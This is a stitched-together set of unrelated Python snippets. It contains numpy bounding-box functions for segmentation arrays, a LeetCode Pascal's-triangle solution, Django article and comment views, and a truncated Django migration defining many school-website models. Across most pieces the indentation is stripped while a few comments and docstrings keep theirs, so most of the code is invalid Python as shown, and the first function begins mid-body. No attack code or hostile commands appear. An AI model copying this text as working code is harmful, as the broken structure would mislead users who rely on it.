uid = uid[uid>0]
if len(uid) == 0:
return np.zeros((1,5+do_count),dtype=np.uint32)
um = uid.max()
out = np.zeros((1+int(um),5+do_count),dtype=np.uint32)
out[:,0] = np.arange(out.shape[0])
out[:,1] = sz[0]
out[:,3] = sz[1]
# for each row
rids = np.where((seg>0).sum(axis=1)>0)[0]
for rid in rids:
sid = np.unique(seg[rid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,1] = np.minimum(out[sid,1],rid)
out[sid,2] = np.maximum(out[sid,2],rid)
cids = np.where((seg>0).sum(axis=0)>0)[0]
for cid in cids:
sid = np.unique(seg[:,cid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,3] = np.minimum(out[sid,3],cid)
out[sid,4] = np.maximum(out[sid,4],cid)
if do_count:
ui,uc = np.unique(seg,return_counts=True)
out[ui,-1]=uc
return out[uid]
def get_bb_all3d(seg,do_count=False, uid=None):
    """Per-label bounding boxes for a 3D label volume. Returns one row per label
    actually present: [id, z_min, z_max, y_min, y_max, x_min, x_max], plus a
    voxel count column when do_count is True."""
    sz = seg.shape
assert len(sz)==3
if uid is None:
uid = seg
um = int(uid.max())
out = np.zeros((1+um,7+do_count),dtype=np.int32)
out[:,0] = np.arange(out.shape[0])
out[:,1] = sz[0]
out[:,2] = -1
out[:,3] = sz[1]
out[:,4] = -1
out[:,5] = sz[2]
out[:,6] = -1
# for each slice
zids = np.where((seg>0).sum(axis=1).sum(axis=1)>0)[0]
for zid in zids:
sid = np.unique(seg[zid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,1] = np.minimum(out[sid,1],zid)
out[sid,2] = np.maximum(out[sid,2],zid)
# for each row
rids = np.where((seg>0).sum(axis=0).sum(axis=1)>0)[0]
for rid in rids:
sid = np.unique(seg[:,rid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,3] = np.minimum(out[sid,3],rid)
out[sid,4] = np.maximum(out[sid,4],rid)
# for each col
cids = np.where((seg>0).sum(axis=0).sum(axis=0)>0)[0]
for cid in cids:
sid = np.unique(seg[:,:,cid])
sid = sid[(sid>0)*(sid<=um)]
out[sid,5] = np.minimum(out[sid,5],cid)
out[sid,6] = np.maximum(out[sid,6],cid)
if do_count:
ui,uc = np.unique(seg,return_counts=True)
out[ui[ui<=um],-1]=uc[ui<=um]
return out[np.all(out!=-1, axis=-1)].astype(np.uint32)
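if __name__ == '__main__':
    # Small self-check sketch (not part of the original module): bounding boxes
    # of two labelled squares in a toy 2D segmentation.
    toy = np.zeros((6, 6), dtype=np.uint16)
    toy[1:3, 1:3] = 1   # label 1 covers rows 1-2, cols 1-2
    toy[3:6, 4:6] = 2   # label 2 covers rows 3-5, cols 4-5
    print(get_bb(toy))        # [1, 5, 1, 5]: bbox of all foreground
    print(get_bb_all2d(toy))  # rows [id, ymin, ymax, xmin, xmax]: [[1 1 2 1 2], [2 3 5 4 5]]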
|
class Solution(object):
def getRow(self, rowIndex):
"""
        https://leetcode.com/problems/pascals-triangle-ii/
        Return the rowIndex-th (0-indexed) row of Pascal's triangle, building each
        binomial coefficient C(rowIndex, i) incrementally.
        """
li = []
x = l = 1
for i in range(0, rowIndex+1):
            li.append(x // l)  # x is always divisible by l here; integer division keeps the entries as ints
x *= (rowIndex-i)
l *= i+1
# li += li[0:rowIndex//2+rowIndex%2][::-1]
return li
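# Quick illustrative check (not part of the original solution):
# print(Solution().getRow(4))  # -> [1, 4, 6, 4, 1]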
|
from django.shortcuts import render
from .models import Article
from django.http import Http404, HttpResponseRedirect
from django.urls import reverse
def index(request):
latest_articles_list = Article.objects.order_by('-pub_date')[:5]
return render(request, 'articles/list.html', {'latest_articles_list': latest_articles_list})
def detail(request, article_id):
try:
a = Article.objects.get(id=article_id)
    except Article.DoesNotExist:
        raise Http404("Article not found")
comment_list = a.comment_set.order_by('id')[:10]
return render(request, 'articles/detail.html', {'article': a, 'comment_list': comment_list})
def leave_comment(request, article_id):
try:
a = Article.objects.get(id=article_id)
    except Article.DoesNotExist:
        raise Http404("Article not found")
a.comment_set.create(author_name = request.POST['name'], comment_text = request.POST['text'])
return HttpResponseRedirect( reverse('articles:detail', args=(a.id,)))
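# A minimal urls.py sketch these views assume (the 'articles:detail' name is inferred
# from the reverse() call above; the other route names are illustrative only):
#
# from django.urls import path
# from . import views
#
# app_name = 'articles'
# urlpatterns = [
#     path('', views.index, name='index'),
#     path('<int:article_id>/', views.detail, name='detail'),
#     path('<int:article_id>/leave_comment/', views.leave_comment, name='leave_comment'),
# ]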
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-29 20:46
from __future__ import unicode_literals
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Form_four_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_four_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_one_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_one_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_three_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_three_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_two_classes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Form_two_news_portal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_alumnae',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('achievement', models.CharField(max_length=250)),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_bakery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_biology_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_biology_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_boarding_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_bog_chairperson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_car_park',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_chemistry_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_chemistry_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_christian_union_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_computer_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_cre_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_debate_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_dining_hall',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_documents_downloads',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document_name', models.CharField(max_length=200)),
('document_file', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_dp_academics',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_dp_admin',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_drama_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_english_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_fence',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_foreignlanguages_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_forest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_games_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_general_information',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('school_logo', models.FileField(upload_to='uploads/')),
('school_admission', models.TextField()),
('school_rules', models.TextField()),
('school_twitterlink', models.TextField(validators=[django.core.validators.URLValidator()])),
('school_facebooklink', models.TextField(validators=[django.core.validators.URLValidator()])),
('school_anthem', models.TextField()),
('school_core_values', models.TextField()),
('current_year', models.IntegerField(default=2007)),
('school_address', models.TextField()),
('school_emailaddress', models.EmailField(blank=True, max_length=70)),
('school_phone_number', models.CharField(max_length=15)),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_generator',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_geography_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_guiding_and_counseling_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_history',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_history_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_journalism_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_kiswahili_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_library',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_math_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_mission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_music_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_muslim_students_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_photo_gallery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('description', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_physics_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_physics_lab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_principal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_pta_chairperson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_science_engineering_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_site_map',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_sports_club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_technical_department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('few_words', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_transport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_updates',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('news_title', models.CharField(max_length=200)),
('news_description', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='School_view',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
